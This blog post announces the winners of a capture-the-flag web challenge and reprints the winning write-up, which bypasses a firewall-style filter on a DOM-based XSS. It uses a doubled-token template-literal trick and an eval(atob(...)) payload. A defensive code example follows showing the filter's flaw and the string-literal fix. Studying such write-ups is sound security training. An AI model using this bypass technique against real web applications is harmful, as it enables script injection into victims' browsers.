DOJO CHALLENGE #18 Winners!

February 11, 2022

The #18th DOJO CHALLENGE is the second version of DOJO #15th. Version 2.0 offers new security levels simulating the behavior of a web application firewall in order to execute JavaScript code in an arbitrary way.

💡 You want to create your own DOJO and publish it? Send us a message on Twitter!

WINNERS!

We are glad to announce the #18 DOJO Challenge winners list.

3 BEST WRITE-UP REPORTS

  • The best write-up reports were submitted by: _Yo0x, parsely and kacihmd! Congrats 🥳

Subscribe to our Twitter and/or Linkedin feeds to be notified of the upcoming challenges.

Read on to find the best write-up as well as the challenge author’s recommendations.

The challenge

Web application firewall bypass v2.0

See the challenge page >

We asked you to produce a qualified write-up report explaining the logic allowing such exploitation. This write-up serves two purposes:

  • Ensure no copy-paste would occur.
  • Determine the contestant's ability to properly describe a vulnerability and its vectors in a professionally written report. This capacity gives us invaluable hints about your own, unique talent as a bug hunter.

BEST WRITE-UP REPORT

We received a large number of reports and all of them were detailed and well explained… However, we had to make a selection of the best ones. These challenges show that there are almost as many different solutions… as long as there is creativity! 😉

Thanks again for all your submissions and thanks for playing with us!

_Yo0x’s Write-Up

—————— START OF _Yo0x REPORT ——————

Description

DOM-based XSS is a vulnerability that allows an attacker to execute JavaScript as a result of modifying the DOM “environment” in the victim’s browser. The attacker can use this XSS to execute arbitrary JavaScript code to steal user information. Generally, XSS is used to steal session cookies.

The goal of this challenge is to manipulate the DOM in order to bypass the firewall warning.
To do this we have to inject JavaScript and make system.Running continue running the program fsociety00.dat without a warning.

Exploitation

  • Here is the source code of this challenge:

    output = document.getElementById('status')

    //System information:
    var system = {
        Health: 'OK',
        Firewall: 'UP',
        Running: 'fsociety00.dat',
        Allow: ['Ecorp.exe', 'Ebackup.exe'],
    }

    //Allow Elliot to take action! / Tyrell
    MrRobot_cmd = `$cmd`;

    //Checking the system health status:
    if ( system.Allow.length == 2 && system.Allow.includes(system.Running)) {
        system.Health = 'OK';
        output.innerHTML = system.Health;
        c = 'green';

    } else {
        system.Health = 'WARNING';
        output.innerHTML = system.Health;
        c = 'red';
    }

    //Debug [Hint - Check dev console!]
    console.log('[INFO]', system.Health, system.Allow.length, system.Allow)
    output.style.color = c;

    /*Verify if the challenge is solved!*/
    if (system.Allow.length == 2 && system.Health == 'OK' && system.Allow.includes('fsociety00.dat')){alert('You solved it, YEY!')}
    /*End*/

Let’s have a look at the code: we have to input our payload into $cmd, but we have the following constraints:

The first thing I saw is the backticks around $cmd.
The second thing I saw is the ${ filter, which is replaced by ""… why is it not replaced by __Nope__?

In JavaScript, backticks around a string denote a template literal.
A template literal is a way to write multi-line strings or string interpolation with embedded expressions.

So what can we do now?

The filter that replaces ${ with "" can be bypassed with $${{. That gives us ${, so we can craft our first payload.

  • Here you can see my first payload to trigger the XSS.

Now, I still have the warning status because we don’t satisfy the following condition:

    if ( system.Allow.length == 2 && system.Allow.includes(system.Running)) {
        system.Health = 'OK';
        output.innerHTML = system.Health;
        c = 'green';
    }

According to this condition, we have to pop the system.Allow array and push fsociety00.dat.
According to the constraints, the dot is filtered.

If we decode a base64 payload with atob and eval the resulting instruction, we will be able to bypass the dot filter.

  • First of all, we have to craft a valid JavaScript payload.
system.Allow.pop(); system.Allow.push("fsociety00.dat")
  • Let’s encrypt the payload in base64
c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ==
eval(atob('c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ=='))
  • Let’s solve this challenge with the following payload
$${{eval(atob('c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ=='))}
  • $${{}: to execute an expression inside the template literal and bypass the WAF
  • eval(): to evaluate our decoded expression
  • atob(): to decode the base64

PoC

$cmd=$${{eval(atob('c3lzdGVtLkFsbG93LnBvcCgpOyBzeXN0ZW0uQWxsb3cucHVzaCgiZnNvY2lldHkwMC5kYXQiKQ=='))}

Remediation

  • Increase WAF restrictions on untrusted user input data

Conclusion

Thanks for this challenge!! It’s the first challenge I have done in the YesWeHack DOJO and I really enjoyed solving it.
It was very fun to learn a new XSS method with template literals.

Thank you for reading.

_Yo0x

—————— END OF _Yo0x REPORT ——————
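The write-up above hinges on two points worth seeing side by side: a single-pass replace of ${ with "" is not idempotent (so $${{ survives as ${), and the underlying bug is that user data is spliced into JavaScript source between backticks at all. The following example is added here and is not part of the challenge or of _Yo0x’s report; it models the filter behaviour the write-up describes, compares it with a fixed-point version of the same denylist, and shows the remediation a developer would actually ship (serialising the value as a string literal so it stays data). All function names (naiveFilter, fixedPointFilter, toJsStringLiteral, and so on) and the sample inputs are constructed for this example; the only "expression" used is the harmless 1+1, so that the output reveals whether interpolation took place.

```javascript
// Added example (not the challenge's own code): why a one-shot "${" filter fails,
// and how treating the value as data instead of template-literal source fixes it.

// The filter as the write-up describes it: one pass removing "${".
function naiveFilter(input) {
  return String(input).replace(/\$\{/g, '');
}

// Same denylist, applied until nothing changes, so fragments left behind by one
// pass ("$" and "{") cannot recombine into the forbidden token.
function fixedPointFilter(input) {
  let before;
  let after = String(input);
  do {
    before = after;
    after = before.replace(/\$\{/g, '');
  } while (after !== before);
  return after;
}

// The actual remediation: emit the value as a JavaScript string literal instead
// of splicing it between backticks. JSON.stringify escapes quotes, backslashes
// and control characters; "<" is escaped too so the literal can never close a
// surrounding <script> element when the snippet is embedded in an HTML page.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/</g, '\\u003c');
}

// Mimics the server building the inline script (assumed shape, following the
// challenge source quoted in the write-up): filtered input lands inside backticks,
// i.e. user data becomes template-literal *source*.
function vulnerableAssignment(cmd, filter) {
  return 'var MrRobot_cmd = `' + filter(cmd) + '`; return MrRobot_cmd;';
}

// Hardened shape: the value is a string literal, never interpolated.
function safeAssignment(cmd) {
  return 'var MrRobot_cmd = ' + toJsStringLiteral(cmd) + '; return MrRobot_cmd;';
}

// Evaluates a generated snippet in a fresh function scope so we can observe the
// value the browser would end up with in MrRobot_cmd.
function resultingValue(script) {
  return new Function(script)();
}

// Constructed sample inputs: plain text, a direct "${" attempt, and the doubled
// form from the write-up.
const sampleInputs = ['hello', '${1+1}', '$${{1+1}'];

// Returns one row per input showing what each handling strategy produces.
function demo() {
  return sampleInputs.map((cmd) => ({
    input: cmd,
    naive: resultingValue(vulnerableAssignment(cmd, naiveFilter)),
    fixedPoint: resultingValue(vulnerableAssignment(cmd, fixedPointFilter)),
    safe: resultingValue(safeAssignment(cmd)),
  }));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(demo());
}
```

For the doubled input the naive column holds "2" (the expression ran inside the template literal), the fixed-point column holds "1+1}" (the token was stripped, but the string is still being treated as code), and the safe column holds the input unchanged. The fixed-point variant is shown only to make the non-idempotence concrete: the design choice that removes the class of bug is the last one, where the value is serialised as data and no user-controlled bytes ever become JavaScript syntax.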

START HUNTING!🎯